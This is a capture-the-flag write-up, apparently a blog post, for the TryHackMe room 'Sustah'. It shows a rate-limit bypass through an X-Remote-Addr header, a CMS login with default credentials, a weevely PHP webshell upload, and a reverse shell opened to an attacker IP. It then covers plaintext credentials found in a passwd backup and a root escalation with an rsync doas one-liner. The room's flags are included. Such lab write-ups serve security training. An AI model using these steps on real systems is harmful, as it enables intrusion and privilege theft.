---
layout: post
title: "Sustah - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - web
  - thm
  - cms
  - php
  - eop
  - webshell
date: 2021/01/23 21:43:00
thumbnail: /images/TryHackMe/sustah.jpg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Sustah
- **Profile:** [tryhackme.com](https://tryhackme.com/room/sustah)
- **Difficulty:** Medium
- **Description**: Play a game to gain access to a vulnerable CMS. Can you beat the odds?

![Sustah](/images/TryHackMe/sustah.jpg)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S ffuf weevely nmap pwncat gtfoblookup
```

## Network enumeration

Service scan with nmap:

```
# Nmap 7.91 scan initiated Sat Jan 23 14:28:09 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.95.187
Nmap scan report for 10.10.95.187
Host is up (0.099s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)
|   256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)
|_  256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Susta
8085/tcp open  http    Gunicorn 20.0.4
| http-methods:
|_  Supported Methods: HEAD POST GET OPTIONS
|_http-server-header: gunicorn/20.0.4
|_http-title: Spinner
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 23 14:29:23 2021 -- 1 IP address (1 host up) scanned in 74.06 seconds
```

There is a web service on port 8085.

## HTTP discovery

Let's look at http://10.10.95.187:8085/

There is a spinning wheel but we have only 0.004% chance of winning and there is
also an input field.

The request looks like this.

```
POST / HTTP/1.1
Host: 10.10.95.187:8085
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.95.187:8085
Connection: close
Referer: http://10.10.95.187:8085/
Upgrade-Insecure-Requests: 1

number=10000
```

I tried to bruteforce the number but there is a rate limiting feature.

The answer headers look like that:

```
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Sat, 23 Jan 2021 14:05:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1004
X-RateLimit-Limit: 10
X-RateLimit-Remaining: 8
X-RateLimit-Reset: 1611410771
Retry-After: 15
```

## HTTP attack

Let's check [HackTricks - Rate Limit Bypass](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass)
to change our IP origin using a HTTP header.

I observed that by adding `X-Remote-Addr: 127.0.0.1` the `X-RateLimit-xxx` headers
were removed from the answer.

Now we can try to bruteforce the number, I launched the BurpSuite Intruder
and started from 10000 to 99999 with a 1 step, I stopped after a number
return a 1136 byte answer instead of the 1166 one.

Answer: {% spoiler 10921 %}

In the body of the answer we have a secret path.

Answer: {% spoiler `/YouGotTh3P@th/` %}

But browsing at this path just gives a 404 error.

Let's try on port 80 instead of 8085.

## CMS identification

Yay, it's a CMS overview page and the name of the CMS is in the footer.

Answer: {% spoiler Mara %}

We can consult `/<path>/sitemap.php` to see all existing pages.

By browsing `/<path>/about.php` we can find the installed version (7.2) but it's
not the answer expected, I found another path with a changelog `/<path>/changes.txt`,
this one contains the right version.

Answer: {% spoiler 7.5 %}

Also at `/<path>/lorem.php` there a message:

> Log in with admin and changeme to try the editor.

We can log in with the credentials at `/<path>/lorem.php?login=admin`.

## File upload

We can upload files at `/<path>/codebase/dir.php?type=filenew`.

Let's create a PHP webshell and upload it:

```
$ weevely generate noraj agent.php
Generated 'agent.php' with password 'noraj' of 761 byte size.
```

After upload we can see this message:

```
Processing file upload request...
Please be patient, may take a while.
Do not close this window whilst upload is in progress.
Destination : /var/www/html/<path>/img
OK: agent.php uploaded.
Files saved to: /var/www/html/<path>/img
All files processed successfully
```

So my webshell is available at: `/<path>/img/agent.php`.

And then we can access our webshell:

```
$ weevely http://10.10.224.209/<path>/img/agent.php noraj

[+] weevely 4.0.1

[+] Target:     10.10.224.209
[+] Session:    /home/noraj/.weevely/sessions/10.10.224.209/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu-xenial:/var/www/html/<path>/img $
```

## Webshell to system shell

Let's upgrade into a system shell with weevely reverse shell module:

```
www-data@ubuntu-xenial:/var/www $ :backdoor_reversetcp -shell /bin/bash 10.9.19.77 9999
```

On the attacker machine:

```
$ pwncat -l 9999 -vv
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.224.209:60632 (family 2/IPv4, TCP)
bash: cannot set terminal process group (1220): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu-xenial:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## Elevation of Privilege (EoP): from www-data to kiran

Right now we can't read the user flag:

```
www-data@ubuntu-xenial:/home/kiran $ ls -lhA
total 20K
-rw------- 1 kiran kiran    0 Dec  9 12:29 .bash_history
drwx------ 2 kiran kiran 4.0K Dec  9 04:31 .cache
drwxr-x--- 3 kiran kiran 4.0K Dec  6 18:08 .config
drwx------ 2 kiran kiran 4.0K Dec  6 18:09 .gnupg
-rw-r--r-- 1 kiran kiran  670 Dec  9 06:51 .profile
-r-------- 1 kiran kiran   33 Dec  9 11:07 user.txt
```

There is a hint saying to check for backups but for some reason the find
command is forbidden.

I checked the backup directory

```
www-data@ubuntu-xenial:/var/www$ ls -lhA /var/backups
total 628K
-r--r--r-- 1 root root   1.7K Dec  6 13:19 .bak.passwd
-rw-r--r-- 1 root root    50K Dec  6 06:25 alternatives.tar.0
-rw-r--r-- 1 root root   6.2K Dec  9 06:46 apt.extended_states.0
-rw-r--r-- 1 root root    715 Dec  6 17:08 apt.extended_states.1.gz
-rw-r--r-- 1 root root    509 Nov 12 19:53 dpkg.diversions.0
-rw-r--r-- 1 root root    207 Dec  6 06:01 dpkg.statoverride.0
-rw-r--r-- 1 root root   535K Dec  6 06:19 dpkg.status.0
-rw------- 1 root root    849 Dec  6 06:17 group.bak
-rw------- 1 root shadow  714 Dec  6 06:17 gshadow.bak
-rw------- 1 root root   1.7K Dec  6 13:19 passwd.bak
-rw------- 1 root shadow 1.1K Dec  6 06:17 shadow.bak
```

The hidden backup permission seems wrong.

```
www-data@ubuntu-xenial:/var/www$ cat /var/backups/.bak.passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
kiran:x:1002:1002:trythispasswordforuserkiran:/home/kiran:
```

We got credentials: `kiran` / `trythispasswordforuserkiran`. I'll try them over SSH.

Since we have a TTY reverse shell we can use su.

```
kiran@ubuntu-xenial:~$ cat user.txt
```

Answer: {% spoiler 6b18f161b4de63b5f72577c737b7ebc8 %}

## Elevation of Privilege (EoP): from kiran to root

I tried a find command to enumerated SUID binaries but it didn't worked and which
is weirdly unable to find the binary. Calling the absolute path and I get
a permission denied.

```
kiran@ubuntu-xenial:~$ find / -perm -4000 2>/dev/null

kiran@ubuntu-xenial:~$ which find

kiran@ubuntu-xenial:~$ /usr/bin/find -h
bash: /usr/bin/find: Permission denied

kiran@ubuntu-xenial:~$ ls -lh /usr/bin/find
-rwxr-xr-x+ 1 root root 217K Feb  7  2016 /usr/bin/find

kiran@ubuntu-xenial:~$ getfacl /usr/bin/find
getfacl: Removing leading '/' from absolute path names
# file: usr/bin/find
# owner: root
# group: root
user::rwx
user:www-data:---
user:kiran:---
group::r-x
mask::r-x
other::r-x
```

So any user except www-data & kiran can use the binary.

By looking for a SUID binary manually I found there was `doas` in
`/usr/local/bin`. So we can check the configuration in `/usr/local/etc/doas.conf`
instead of `/etc/doas.conf`.

[Doas](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) is an alternative to sudo.

```
kiran@ubuntu-xenial:~$ ls -lh /usr/local/bin
total 68K
-rwsr-x--x 1 root root  38K Dec  6 17:13 doas
-rwxr-xr-x 1 root root  221 Dec  6 06:21 echo_supervisord_conf
-rwxr-xr-x 1 root root  211 Dec  6 06:17 flask
-rwxr-xr-x 1 root root  220 Dec  6 06:21 gunicorn
-rwxr-xr-x 1 root root  221 Dec  6 06:21 pidproxy
-rwxr-xr-x 1 root root  226 Dec  6 06:21 supervisorctl
-rwxr-xr-x 1 root root  224 Dec  6 06:21 supervisord
-rwxr-xr-x 1 root root 1.2K Dec  6 17:13 vidoas

kiran@ubuntu-xenial:~$ cat /usr/local/etc/doas.conf
 permit nopass kiran as root cmd rsync
```

I deployed and ran `linpeas` and it found the weak configuration too:

```
[+] Checking doas.conf
 permit nopass kiran as root cmd rsync
```

Basically we can run rsync as root.

So let's check an EoP on GTFObin:

```
$ gtfoblookup linux sudo rsync
rsync:

    sudo:

        Code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"'
              127.0.0.1:/dev/null
```

Let's go!

```
kiran@ubuntu-xenial:~$ doas rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt
```

Answer: {% spoiler afbb1696a893f35984163021d03f6095 %}
